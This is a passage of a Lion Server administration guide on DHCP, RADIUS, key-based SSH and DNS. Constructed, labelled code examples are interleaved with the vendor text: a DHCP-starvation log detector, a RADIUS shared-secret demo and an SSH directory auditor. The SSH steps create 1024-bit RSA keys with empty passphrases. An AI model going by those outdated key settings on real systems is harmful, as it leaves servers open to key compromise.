4. Click Overview to view whether the service is running, when it started, the number of static maps, the number of clients connected, and when the last database update occurred.


Use serveradmin to check DHCP service status


To see summary status of DHCP service:
$ sudo serveradmin status dhcp

To see detailed status of the DHCP service:
$ sudo serveradmin fullstatus dhcp

For information about serveradmin, see its man page.


View DHCP log entries


If you've enabled logging for DHCP service, you can check the system log for DHCP errors. The log view is the system.log file filtered for bootpd. Use the Filter field to search for specific entries.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Log.
5. To search for specific entries, use the Filter field (upper right corner).


Use serveradmin to view DHCP log entries


To view DHCP log entries:
$ tail /var/log/system.log

For information about tail, see its man page.
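With the log level set to High, bootpd records each exchange, which is enough to notice DHCP starvation: one machine cycling through forged hardware addresses until the subnet range is exhausted and legitimate clients get no lease. The shell functions below are an added example, not from the guide or from Lion Server. The line shape they parse (a syslog prefix, then "DHCP DISCOVER [iface]: hwtype,MAC") is an assumed approximation of verbose bootpd entries in system.log and is stated in the comment; confirm the field positions against your own log before relying on it. The sample lines are constructed.

```shell
#!/bin/sh
# Added example (not from the Lion Server guide): summarise bootpd DISCOVER
# traffic from system.log to spot pool exhaustion (DHCP starvation), where a
# single host cycles through many hardware addresses until no leases remain.
# Assumed line shape (an approximation of verbose bootpd entries, not a
# format quoted from the guide):
#   <mon> <day> <time> <host> bootpd[<pid>]: DHCP DISCOVER [<iface>]: <hwtype>,<mac> [<name>]

# Read log lines on stdin; print "iface distinct_clients discovers" per interface.
discover_summary() {
    awk '$5 ~ /^bootpd/ && $6 == "DHCP" && $7 == "DISCOVER" {
        iface = $8; gsub(/[^A-Za-z0-9]/, "", iface)      # "[en0]:" -> "en0"
        mac = $9; sub(/^[0-9]+,/, "", mac)                # "1,00:11:..." -> "00:11:..."
        if (!((iface, mac) in seen)) { seen[iface, mac] = 1; clients[iface]++ }
        discovers[iface]++
    }
    END { for (i in clients) printf "%s %d %d\n", i, clients[i], discovers[i] }' | sort
}

# Print each interface whose number of distinct DISCOVERing clients exceeds
# the limit; set the limit from the size of the subnet range you expect to fill.
starvation_suspects() {
    discover_summary | awk -v limit="$1" '$2 > limit { print $1 }'
}

# Constructed sample: twelve different MACs on en0 within seconds (plus one
# repeat and an OFFER line, which is ignored) and a single normal client on en1.
sample_log() {
    i=1
    while [ "$i" -le 12 ]; do
        printf 'Jun  3 09:14:%02d server bootpd[248]: DHCP DISCOVER [en0]: 1,02:00:00:00:00:%02x\n' "$i" "$i"
        i=$((i + 1))
    done
    printf 'Jun  3 09:14:13 server bootpd[248]: DHCP DISCOVER [en0]: 1,02:00:00:00:00:01\n'
    printf 'Jun  3 09:14:13 server bootpd[248]: OFFER sent <no hostname> 192.168.1.10 pktsize 300\n'
    printf 'Jun  3 09:14:14 server bootpd[248]: DHCP DISCOVER [en1]: 1,00:30:a1:a2:a1:23 mylaptop\n'
}

# Demo. On the server: grep bootpd /var/log/system.log | starvation_suspects 50
sample_log | discover_summary
sample_log | starvation_suspects 10
```

Counting distinct hardware addresses rather than raw DISCOVER lines is what separates starvation from an ordinary retry storm, since a single misbehaving client repeats the same address and never drains the pool.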


View the DHCP client list


The DHCP Clients window gives the following information for each client:
The IP address served to the client
The number of days of lease time left (or the number of hours and minutes, if less than 24 hours)
The DHCP client ID (usually the same as the hardware address)
The computer name
The hardware address

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DHCP.
4. Click Clients. To sort the list by different criteria, click a column heading.


Configure DHCP to use extra LDAP server URLs


The Server Admin application's DHCP module enables administrators to specify an LDAP server URL for each subnet. To specify multiple LDAP server URLs, edit the /etc/bootpd.plist file or use the serveradmin command-line tool (from a Terminal window).

Edit the /etc/bootpd.plist file to add multiple LDAP server URLs
After you create a subnet using DHCP in Server Admin and specify a single LDAP server URL, you can inspect and modify settings by editing the /etc/bootpd.plist file.
1. Open the /etc/bootpd.plist file in an editor.
2. Locate the <string> tag between the <array> tags of the dhcp_ldap_url key.
    <key>dhcp_ldap_url</key>
    <array>
        <string>ldap://server.example.com/dc=server,dc=example,dc=com</string>
    </array>
3. Add another LDAP server URL by inserting a <string> tag below the existing <string> tag and entering your LDAP server URL between the opening <string> and closing </string> tags.
    <key>dhcp_ldap_url</key>
    <array>
        <string>ldap://server.example.com/dc=server,dc=example,dc=com</string>
        <string>ldap://server2.example.com/dc=server2,dc=example,dc=com</string>
    </array>
4. Save the bootpd.plist file and exit your editor.
5. If DHCP is running, use Terminal to restart DHCP service so it can pick up the revised configuration.
    $ sudo serveradmin stop dhcp
    $ sudo serveradmin start dhcp

Use serveradmin to add multiple LDAP server URLs
After you create a subnet using Server Admin DHCP and specify an LDAP server URL, you can inspect and modify settings using serveradmin. Do the following.
1. Inspect DHCP subnet settings in Terminal by entering:
    $ sudo serveradmin settings dhcp:subnets
   Example result (excerpt):
    ...
    dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_url:_array_index:0 = "lda
    ...
2. Prepare a file with the serveradmin commands to add a second LDAP server URL. Because the elements of the dhcp_ldap_url array are not individually accessible, you cannot use the serveradmin create/delete idiom. Example file contents:
    dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_url:_array_index:0 = "lda
    dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_url:_array_index:1 = "lda
   Note: Array indexes start with 0. The old URL entry must be present even though you are adding a second one. The entries must be in order.
3. Use the serveradmin tool to apply the settings from the file by entering:
    $ sudo serveradmin settings < filename
   Example result (the settings are confirmed):
    dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_url:_array_index:0 = "lda
    dhcp:subnets:_array_id:498D8E6D-88A8-4048-8B3C-14D96F317447:dhcp_ldap_url:_array_index:1 = "lda
4. If DHCP is running, restart DHCP service so it can pick up the revised configuration by entering:
    $ sudo serveradmin stop dhcp
    $ sudo serveradmin start dhcp


DHCP service for Mac OS X clients using DHCP with a manual address
The DHCP section of Server Admin permits each subnet address range to be enabled or disabled. When the subnet is enabled, the DHCP server allocates addresses in its range and dispenses other network information to clients that are configured as Using DHCP. When the subnet is disabled, the DHCP server does not allocate addresses from the subnet address range pool, but it does dispense other network information (such as DNS and LDAP server addresses) to clients that are configured as Using DHCP with manual address (static maps), as long as the client address is in the subnet range. In other words, disabling the subnet turns off automatic address allocation for the address range, but it does not disable DHCP server responses to a client whose address is in the subnet range.


Configure DHCP on clients


You can configure clients to use DHCP to obtain IP addresses.

1. Choose Apple > System Preferences and then click Network.
2. From the Services list, select the network connection service for your account (such as Built-in Ethernet).
3. From the Configure pop-up menu, select Using DHCP.


Configure a static IP address on a client


You can configure clients to use static IP addresses.

1. Choose Apple > System Preferences and then click Network.
2. From the Services list, select the network connection service for your account (such as Built-in Ethernet).
3. From the Configure pop-up menu, choose one of the following methods:
Manually: enter the IP address, subnet mask, router, and DNS information in the relevant fields.
Using DHCP with manual address: enter the IP address and DNS information in the relevant fields.

If your DHCP server is using static mapping, configure client computers to use DHCP. When your client computers connect to your network they always obtain the same IP address. The static mapping uses the MAC address of the client computer to determine the IP address the client is assigned.


More DHCP information


Request for Comments (RFC) documents provide an overview of a protocol or service and explain how the protocol should behave. If you're a novice server administrator, you'll probably find the background information in an RFC helpful. If you're an experienced server administrator, you can find technical details about a protocol in its RFC document. You can search for RFC documents by number at www.ietf.org/rfc.html.

For details about DHCP, see RFC 2131. For more information about advanced configuration options, see the bootpd man page.

Network infrastructure services
RADIUS
About RADIUS
Wireless networking gives companies greater network flexibility, seamlessly connecting laptop users to the network and giving them the freedom to move within the company while staying connected to the network.

You use RADIUS to authorize Open Directory users and groups so they can access AirPort Base Stations on a network. By configuring RADIUS and Open Directory you can control who has access to your wireless network.

RADIUS works with Open Directory and Password Server to grant authorized users access to the network through an AirPort Base Station. When a user attempts to access an AirPort Base Station, AirPort communicates with the RADIUS server using Extensible Authentication Protocol (EAP) to authenticate and authorize the user. Users are given access to the network if their user credentials are valid and they are authorized to use the AirPort Base Station. If a user is not authorized, he or she cannot access the network through the AirPort Base Station.

Network infrastructure services
RADIUS
Set Up RADIUS

RADIUS setup overview


The following steps outline the tasks to configure and set up RADIUS service.

Turn RADIUS on
Before you can configure the service, turn RADIUS on. See Enable RADIUS.

Add AirPort Base Stations to a RADIUS server
Decide which AirPort Base Stations to add to the RADIUS server. See Add AirPort Base Stations to a RADIUS server.

Remotely configure an AirPort Base Station
Use Server Admin to configure AirPort Base Stations. See Remotely configure AirPort Base Stations.

Configure RADIUS to use certificates
Use Server Admin to configure RADIUS to use certificates to trust Base Stations. See Configure RADIUS to use certificates.

Start RADIUS
To start RADIUS, see Start or stop RADIUS.


Enable RADIUS

Before you can configure RADIUS settings, turn on RADIUS service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings, then click Services.
3. Select the RADIUS checkbox.
4. Click Save.


Use the configuration assistant to configure RADIUS


You can use the RADIUS configuration assistant to configure RADIUS. The configuration assistant guides you through the RADIUS configuration process and lets you start RADIUS.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Overview.
5. Click Configure RADIUS Service.
6. In the RADIUS Server Certificate pane, select one of the following:
   If you select Choose an existing certificate, choose the certificate from the pop-up menu and click Continue.
   If you want to create a self-signed certificate, use Certificate Assistant. For more information, see Server Admin Help.
7. From the Available Base Stations list, select the Base Station you want and click Add.
8. Enter the password of the Base Station in the Base Station Password field, then click Add. To remove a Base Station from the Selected Base Stations list, select it and click Remove.
9. Click Continue.
10. In the RADIUS Allow Users pane, you can restrict user access:
   If you select Allow all users, all users can access the Base Stations you select.
   If you select Restrict to members of group, only members of that group can access the Base Stations you select.
11. Click Continue.
12. In the RADIUS setting confirmation pane, verify your settings. You can also print or save your RADIUS configuration settings.
13. Click Confirm.

Use radiusconfig to configure RADIUS


You can use radiusconfig to configure RADIUS.

To view RADIUS settings, run radiusconfig with one of the following options:
$ sudo radiusconfig [-appleversion | -getconfig | -getconfigxml | -nascount | -naslist | -naslistxml | -ver]

To configure RADIUS parameters:
$ sudo radiusconfig -setconfig key value [key value ...]

Parameter   Description
key         The name of the key to configure in the radiusd.conf or eap.conf files.
value       The value of the key.

For information about RADIUS server settings, see RADIUS command-line settings. For information about radiusconfig, see its man page.

Add AirPort Base Stations to a RADIUS server


You use the Base Stations pane of RADIUS in Server Admin to add AirPort Base Stations that will use RADIUS service. You can add up to 64 Base Stations to RADIUS.

1. On the management computer, open Server Admin.
2. Click the triangle at the left of the server. The list of services appears.
3. In the expanded Servers list, click RADIUS.
4. Click Base Stations.
5. Below the AirPort Base Stations list, click the Add button (+).
6. Enter the following AirPort Base Station information:
   Name: Specify the name of the AirPort Base Station.
   Type: Specify the model of the AirPort Base Station.
   IP Address: Specify the IP address of the AirPort Base Station.
   Shared Secret and Verify: Specify a shared secret. The shared secret is not a password for authentication, nor does it generate encryption keys to establish secure tunnels between nodes. It is a token that key management systems use to trust each other. You must enter the shared secret on the server as well as on the client.
7. Click Add.

Add Bonjour-enabled AirPort Base Stations to a RADIUS server


If your network has AirPort Base Stations that announce themselves using Bonjour, use the Base Stations pane of RADIUS in Server Admin to add them to your RADIUS server. You can add up to 64 Base Stations to RADIUS.

1. On the management computer, open Server Admin.
2. Click the triangle at the left of the server. The list of services appears.
3. In the expanded Servers list, click RADIUS.
4. Click Base Stations.
5. Below the AirPort Base Stations list, click Browse. A list of AirPort Base Stations found through Bonjour appears. It shows all AirPort Base Stations on the server's local subnet and all Wide-Area Bonjour domains known to the server. This includes search domains listed in Network Preferences that have AirPort Base Stations and AirPort Base Stations you added to a MobileMe account as a Back to My Mac (BTMM) enabled server.
6. From the list of AirPort Base Stations, choose an AirPort Base Station to add to your RADIUS server.
7. In the Base station password field, enter the password for the AirPort Base Station.
8. Click Add. When the base station is added it is configured to use WPA2 Enterprise for client authentication through TTLS. It also sets a random shared secret for communication between the Base Station and RADIUS on the server. The shared secret is not a password for authentication, nor does it generate encryption keys to establish secure tunnels between nodes. It is a token that key management systems use to trust each other.
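The two procedures above both describe the shared secret as a token the Base Station and the server use to trust each other. The following is an added example, not code from the Lion Server documentation or from Apple, that shows what that trust consists of at the RADIUS protocol level (RFC 2865): the secret never crosses the network, but it is mixed into the MD5 Response Authenticator of every reply, so a Base Station can tell that an Access-Accept came from a server holding the same secret and was not altered on the way. The secret, user name and identifier values are constructed for the demonstration.

```python
"""Constructed example: what the RADIUS shared secret protects (RFC 2865, section 3)."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST = 1
ACCESS_ACCEPT = 2
ACCESS_REJECT = 3
ATTR_USER_NAME = 1
HEADER_LEN = 20  # code(1) + identifier(1) + length(2) + authenticator(16)


def attribute(attr_type, value):
    """Encode one RADIUS attribute as Type, Length, Value."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_packet(code, identifier, authenticator, attributes):
    """Assemble a RADIUS packet: 4-byte header, 16-byte authenticator, attributes."""
    length = HEADER_LEN + len(attributes)
    return struct.pack("!BBH", code, identifier, length) + authenticator + attributes


def response_authenticator(code, identifier, attributes, request_authenticator, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret): binds the reply to the request and the secret."""
    length = HEADER_LEN + len(attributes)
    header = struct.pack("!BBH", code, identifier, length)
    return hashlib.md5(header + request_authenticator + attributes + secret).digest()


def verify_response(response, request_authenticator, secret):
    """Return True only if the reply was produced with the same secret and is intact."""
    if len(response) < HEADER_LEN:
        return False
    code, identifier, length = struct.unpack("!BBH", response[:4])
    if length != len(response):
        return False
    received = response[4:HEADER_LEN]
    attributes = response[HEADER_LEN:]
    expected = response_authenticator(code, identifier, attributes, request_authenticator, secret)
    return hmac.compare_digest(received, expected)


def demo(secret=b"constructed-shared-secret"):
    """Simulate one exchange; return (valid, wrong_secret_rejected, tampering_rejected)."""
    # Base Station (NAS) side: a fresh random Request Authenticator per request.
    request_auth = os.urandom(16)
    identifier = 42
    request = build_packet(ACCESS_REQUEST, identifier, request_auth, attribute(ATTR_USER_NAME, b"alice"))
    assert request[0] == ACCESS_REQUEST  # this is what would be sent to the server

    # Server side: answer with an Access-Accept whose authenticator covers the reply and the secret.
    reply_attrs = attribute(ATTR_USER_NAME, b"alice")
    reply_auth = response_authenticator(ACCESS_ACCEPT, identifier, reply_attrs, request_auth, secret)
    reply = build_packet(ACCESS_ACCEPT, identifier, reply_auth, reply_attrs)

    # Base Station side: verify the reply three ways.
    valid = verify_response(reply, request_auth, secret)
    wrong_secret_rejected = not verify_response(reply, request_auth, b"some-other-secret")
    # A reply whose code was flipped in transit (Accept -> Reject) no longer matches its authenticator.
    tampered = bytes([ACCESS_REJECT]) + reply[1:]
    tampering_rejected = not verify_response(tampered, request_auth, secret)
    return valid, wrong_secret_rejected, tampering_rejected


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```

Two caveats belong with this picture. The construction only authenticates the server's replies; for EAP exchanges such as the WPA2 Enterprise/TTLS setup the Bonjour procedure configures, RFC 3579 additionally requires the Message-Authenticator attribute (an HMAC-MD5 over the whole packet under the same secret) so that requests are protected too. And because MD5 over the secret is all that stands between a forged reply and the Base Station, a short or guessable secret can be recovered offline from captured packets, which is why the random secret the Bonjour procedure generates is preferable to a hand-typed one.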

Remotely configure AirPort Base Stations


You can remotely configure AirPort Base Stations to use a RADIUS server in Server Admin.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Stations list, highlight the AirPort Base Station and then click Edit. If prompted, enter the AirPort administrator password.
6. Click OK.

Configure RADIUS to use certificates


You can use Server Admin to configure RADIUS to use custom certificates. Using a certificate increases the security and manageability of AirPort Base Stations.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Settings.
5. From the RADIUS Certificate pop-up menu, choose a certificate. If you don't have a certificate and want to create one, click Manage Certificates. For more information about creating certificates, see Server Admin Help.
6. Click Save.

Use radiusconfig to configure RADIUS certificates


You can use radiusconfig to import certificates for RADIUS.

To configure RADIUS certificates:
$ sudo radiusconfig -installcerts private-key certificate [trusted-ca-list [yes | no [common-name]]]

Parameter        Description
private-key      The file path to the client's private key to use in the certificate
certificate      The file path to the certificate
trusted-ca-list  The file path to the trusted CA list
yes              A request to check a certificate revocation list
no               A request to not check a certificate revocation list
common-name      The common name

This command changes eap.conf to contain an active TLS section and configures the certificates. This command also replaces the random file and creates the dh file if absent. For information about radiusconfig, see its man page.

Archive RADIUS service logs


RADIUS service creates entries in the system log for error and alert messages. You can archive these log entries.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Settings.
5. Select the Archive radiusd log for the past __ days checkbox and enter the number of days to archive.
6. Click Save.

Use radiusconfig to archive service logs


You can use radiusconfig to archive RADIUS service logs.

To configure the rotation of RADIUS service logs:
$ sudo radiusconfig -rotatelog [-n file-count] base-file

To configure the automatic rotation of RADIUS service logs:
$ sudo radiusconfig -autorotatelog [on | off] [-n file-count]

Parameter   Description
file-count  Specifies the number of log files to preserve.
base-file   Specifies the name of the log file.
on          Enables automatic log rotation.
off         Disables automatic log rotation.

For information about radiusconfig, see its man page.

Start or stop RADIUS


You use Server Admin to start or stop RADIUS. When you stop RADIUS, make sure no users are connected to AirPort Base Stations your RADIUS server manages.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Below the Servers list, click Start RADIUS or Stop RADIUS. The service can take a few seconds to start or stop.

Use radiusconfig to start or stop RADIUS


You can use radiusconfig to stop or start RADIUS.

To start the RADIUS server:
$ sudo radiusconfig -start

To stop the RADIUS server:
$ sudo radiusconfig -stop

For information about radiusconfig, see its man page.

RADIUS command-line settings


To change settings for RADIUS, use the following parameters with the radiusconfig tool.
Command option   Description
-appleversion    Displays the version of the tool, including the build version.
-getconfig       Displays configuration data stored in the radiusd.conf and eap.conf files in an abbreviated, user-friendly format.
-getconfigxml    Displays configuration data stored in the radiusd.conf and eap.conf files in xml plist format.
-nascount        Displays the number of RADIUS clients.
-naslist         Displays the list of RADIUS clients formatted for the clients.conf file.
-naslistxml      Displays the list of RADIUS clients in xml plist format.
-ver             Displays a specific build version.
-help            Displays usage information.
-q               Suppresses prompts.

Enable or disable transport level security (TLS)


You can enable or disable Transport Level Security (TLS) by modifying the TLS section of the eap.conf file.

To enable TLS:
$ sudo radiusconfig -enable-tls

To disable TLS:
$ sudo radiusconfig -disable-tls

Netw ork infrastructure serv ices

RADIUS

Manage RADIUS

Check RADIUS Status


You can use Server Admin to check the status of RADIUS.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Overview to see whether the service is running, the number of client base stations, and when it was started.

View RADIUS logs


RADIUS creates entries in the system log for error and alert messages. You can filter the log to narrow the number of viewable log entries and make it easier to find an entry.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Logs.
5. Choose a log to view (radiusconfig or radiusd).

Edit RADIUS access


You can restrict access to RADIUS by creating a group of users and adding them to the service access control list (SACL) of RADIUS.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Settings, then click Edit Allowed Users.
5. Select For selected services below, then select RADIUS.
6. Click Services.
7. Select Allow only users and groups below.
8. Click the Add button (+).
9. From the Users & Groups window, drag users or groups to the Allow only users and groups below list. If you don't see a recently created user, click the Refresh button (below the Servers list). If you want to remove users from the Allow only users and groups below list, select the users or user groups and click the Delete button (-).

Only users in the list can use RADIUS service.

Delete AirPort Base Stations


You can use Server Admin to delete AirPort Base Stations from the RADIUS server. When you delete AirPort Base Stations, make sure the stations are disconnected from the network. Otherwise, unauthorized users might access your network.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Station list, highlight a Base Station and click Remove.
6. Verify you want to remove the Base Station by clicking Remove again.

Edit an AirPort Base Station record


You can use Server Admin to edit an AirPort Base Station record on your RADIUS server.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Station list, highlight the Base Station to modify and click the Edit button.
6. Modify the Base Station information and click Save.

Save an AirPort Base Station Internet connect file


You can use Server Admin to save an AirPort Base Station Internet connect file.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select RADIUS.
4. Click Base Stations.
5. In the AirPort Base Station list, highlight the base station.
6. Click Save Internet Connect File.
7. In the Save As field, enter the name.
8. From the Where pop-up menu, choose the location to save the file.
9. In the Wireless Network Name (SSID) field, enter the wireless network name.
10. Click Save.

Use radiusconfig to manage RADIUS clients


Use the radiusconfig tool to add, import, remove, and configure RADIUS clients.

To add RADIUS clients:
$ sudo radiusconfig -addclient nas-name shortname [type]

To import RADIUS clients:
$ sudo radiusconfig -importclients xml-plist-file

To remove RADIUS clients:
$ sudo radiusconfig -removeclient nas-name [nas-name ...]

To assign an access control group to a client of the RADIUS service:
$ sudo radiusconfig -setgroup nas-name group-name

Parameter       Description
nas-name        The name of the client
shortname       The shortname of the client
type            (Optional) The type of the client
xml-plist-file  The name of the file, including the path, to import clients from
group-name      The name of the access control group

For information about radiusconfig, see its man page.

SSH key authentication

Key-Based SSH login


SSH is a network protocol that establishes a secure channel between your computer and a remote computer. It uses public-key cryptography to authenticate the remote computer. It also provides encryption and data integrity for the traffic exchanged between computers.

Key-based authentication is helpful for such tasks as automating file transfers and backups and for creating failover scripts because it allows computers to communicate without a user needing to enter a password.

Important: Key-based authentication has risks. If the private key you generate becomes compromised, unauthorized users can access your computers. You must determine whether the advantages of key-based authentication are worth the risks.

SSH is frequently used to log in to a remote machine to execute commands, but you can also use it to create a secure data tunnel, forwarding through an arbitrary TCP port. You can also use SSH to transfer files using SFTP and SCP. By default, an SSH server uses the standard TCP port 22.

Lion Server uses OpenSSH as the basis for its SSH tools. Notably, portable home directory synchronization and Open Directory replication are provided via SSH.

Generate a key pair for SSH authentication


This is the process of setting up key-based SSH login authentication on Lion Server. To set up key-based SSH, you must generate the keys the two computers will use to establish and validate each other's identity. This doesn't authorize all users of the computer to have SSH access. Keys must be generated for each user account. To do this, you must run the following commands in Terminal. The process must be repeated for each user that needs to open key-based SSH sessions.

Important: Key-based authentication has risks. If the private key you generate becomes compromised, unauthorized users can access your computers. You must determine whether the advantages of key-based authentication are worth the risks.

1. Verify that an .ssh folder exists in your home folder by entering the command:
   ls -ld ~/.ssh
   If .ssh is listed in the output, move to step 2. If .ssh is not listed in the output, run mkdir -m 700 ~/.ssh and continue to step 2.
2. Change directories in the shell to the hidden .ssh directory by entering the following command:
   cd ~/.ssh
3. Generate the public and private keys by entering the following command:
   ssh-keygen -b 1024 -t rsa -f id_rsa -P ''
   The -b flag sets the length of the keys to 1,024 bits, -t selects the key type (RSA), -f sets the file name as id_rsa, and -P followed by two single-quote marks sets the private key passphrase to be empty. The empty passphrase allows for automated SSH connections. Keys are equivalent to passwords, so keep them private and protected.
4. Copy the public key into the authorized key file by entering the following command:
   cat id_rsa.pub >> authorized_keys2
5. Set the permissions on the private key so the file can only be read or changed by the owner:
   chmod go-rwx ~/.ssh/id_rsa
6. Copy the public key and the authorized key list to the specified user's home folder on the remote computer by entering the following command:
   scp authorized_keys2 username@remotemachine:~/.ssh/

To establish two-way communication between servers, repeat this process on the second computer.
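The following is an added example, not part of the Lion Server documentation, of a check to run after the procedure above: it audits a .ssh directory against the layout the steps produce. It verifies that the directory is mode 700 (step 1), that private keys are not readable by group or others (step 5), and that every entry in authorized_keys or authorized_keys2 (step 4) is a well-formed public key. Because the keys generated above have an empty passphrase, it also flags entries that carry no from= or command= option; both are standard OpenSSH authorized_keys options that limit where a key may connect from and what it may run. The key material, host names and files built by demo() are constructed for the demonstration.

```python
"""Constructed example: audit a .ssh directory after key-based SSH setup."""
import base64
import binascii
import os
import stat
import tempfile

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}
PRIVATE_KEY_NAMES = ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")


def split_fields(line):
    """Split on whitespace but keep quoted option values (command="a b") together."""
    fields, current, quoted = [], "", False
    for ch in line:
        if ch == '"':
            quoted = not quoted
            current += ch
        elif ch.isspace() and not quoted:
            if current:
                fields.append(current)
                current = ""
        else:
            current += ch
    if current:
        fields.append(current)
    return fields


def parse_authorized_key(line):
    """Return (options, key_type, comment), or None if the line is not a key entry."""
    fields = split_fields(line.strip())
    for i, tok in enumerate(fields):
        if tok in KEY_TYPES and i + 1 < len(fields):
            try:
                base64.b64decode(fields[i + 1], validate=True)  # the key blob must be base64
            except binascii.Error:
                return None
            return " ".join(fields[:i]), tok, " ".join(fields[i + 2:])
    return None


def group_or_world_accessible(path):
    """True if any group/other permission bit is set (the bits chmod go-rwx clears)."""
    return bool(stat.S_IMODE(os.stat(path).st_mode) & 0o077)


def audit_ssh_dir(ssh_dir):
    """Return a list of (severity, message); an empty list means every check passed."""
    findings = []
    if group_or_world_accessible(ssh_dir):
        findings.append(("high", f"{ssh_dir} is accessible to group/others; expected mode 700"))
    for name in PRIVATE_KEY_NAMES:
        path = os.path.join(ssh_dir, name)
        if os.path.exists(path) and group_or_world_accessible(path):
            findings.append(("high", f"private key {name} is readable by group/others; run chmod go-rwx"))
    for name in ("authorized_keys", "authorized_keys2"):
        path = os.path.join(ssh_dir, name)
        if not os.path.exists(path):
            continue
        with open(path) as fh:
            for lineno, line in enumerate(fh, 1):
                if not line.strip() or line.lstrip().startswith("#"):
                    continue
                parsed = parse_authorized_key(line)
                if parsed is None:
                    findings.append(("medium", f"{name}:{lineno} is not a valid public key entry"))
                elif "from=" not in parsed[0] and "command=" not in parsed[0]:
                    findings.append(("low", f"{name}:{lineno} ({parsed[1]} {parsed[2]}) has no from= or command= restriction"))
    return findings


def demo():
    """Build a constructed .ssh layout, audit it, apply the chmod fix from step 5, audit again."""
    ssh_dir = os.path.join(tempfile.mkdtemp(), ".ssh")
    os.mkdir(ssh_dir, 0o700)
    key = os.path.join(ssh_dir, "id_rsa")
    with open(key, "w") as fh:
        fh.write("-----BEGIN CONSTRUCTED PLACEHOLDER KEY-----\n")  # not a real key
    os.chmod(key, 0o644)  # the mistake that step 5 corrects
    blob = "AAAAB3NzaC1yc2E="  # constructed: valid base64, not real key material
    with open(os.path.join(ssh_dir, "authorized_keys2"), "w") as fh:
        fh.write(f"ssh-rsa {blob} admin@constructed-host\n")
        fh.write(f'from="192.0.2.10",command="/usr/sbin/softwareupdate -i -a" ssh-rsa {blob} updater@constructed-host\n')
        fh.write("this is not a key\n")
    before = audit_ssh_dir(ssh_dir)
    os.chmod(key, 0o600)
    after = audit_ssh_dir(ssh_dir)
    return before, after


if __name__ == "__main__":
    for label, findings in zip(("before", "after"), demo()):
        print(label, findings)
```

Run it against a real account with audit_ssh_dir(os.path.expanduser("~/.ssh")). The second authorized_keys2 entry in demo() shows the mitigation for the risk the documentation warns about: a passphrase-less key that may only connect from one address and may only run one command limits what an attacker gains if the private key leaks.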

Key-Based SSH with scripting sample


A cluster of servers is an ideal environment for using key-based SSH.

The following Perl script is a trivial scripting example that should not be implemented, but it demonstrates connecting over an SSH tunnel to servers defined in the variable serverList, running softwareupdate, installing available updates, and restarting the computer if necessary. The script assumes that key-based SSH was set up for an admin user on all servers to be updated.

#!/usr/bin/perl
use strict;
use warnings;

# \@ is the escape sequence for the "@" symbol inside a double-quoted string.
my @serverList = ("admin\@exampleserver1.example.com", "admin\@exampleserver2.example.com");

foreach my $server (@serverList) {
    # Run softwareupdate on the remote server and read its output.
    # batchmode=yes makes ssh fail instead of prompting if key-based login does not work.
    open(my $sbuff, "-|", "ssh $server -x -o batchmode=yes 'softwareupdate -i -a'")
        or die "Cannot run ssh to $server: $!";
    my $flag = 0;    # set when softwareupdate reports that a restart is needed
    while (my $line = <$sbuff>) {
        chomp($line);
        # check for restart text in the softwareupdate output
        if ($line =~ /Please restart immediately/) {
            $flag = 1;
        }
    }
    close($sbuff);
    if ($flag == 1) {
        system("ssh $server -x -o batchmode=yes 'shutdown -r now'");
    }
}

DNS

About DNS service


When users want to connect to a network resource such as a web or file server, they typically request it by domain name (such as www.example.com) rather than by IP address (such as 192.168.12.12). The Domain Name System (DNS) is a distributed database that maps IP addresses to domain names so users can find the resources by name rather than numerical address.

A DNS server keeps a list of domain names and the IP addresses associated with each name. When a computer needs to find the IP address for a name, it sends a message to the DNS server, which is also known as a name server. The name server looks up the IP address and sends it back to the computer. If the name server doesn't have the IP address locally, it sends messages to other name servers on the Internet until the IP address is found.

Setting up and maintaining a DNS server is a complex process. Therefore, many administrators rely on their Internet Service Provider (ISP) for DNS service. In this case, you only need to configure your network preferences with the IP address of the name server, which is provided by your ISP.

If you don't have an ISP to handle DNS requests for your network and any of the following are true, you must set up your own DNS service:
- You can't use DNS from your ISP or other source.
- You plan on making frequent changes to the name space and want to maintain it yourself.
- You have a mail server on your network and you have difficulties coordinating with the ISP that maintains your domain.
- You have security concerns because your network's computer names and addresses are accessible to an outside organization (your ISP).

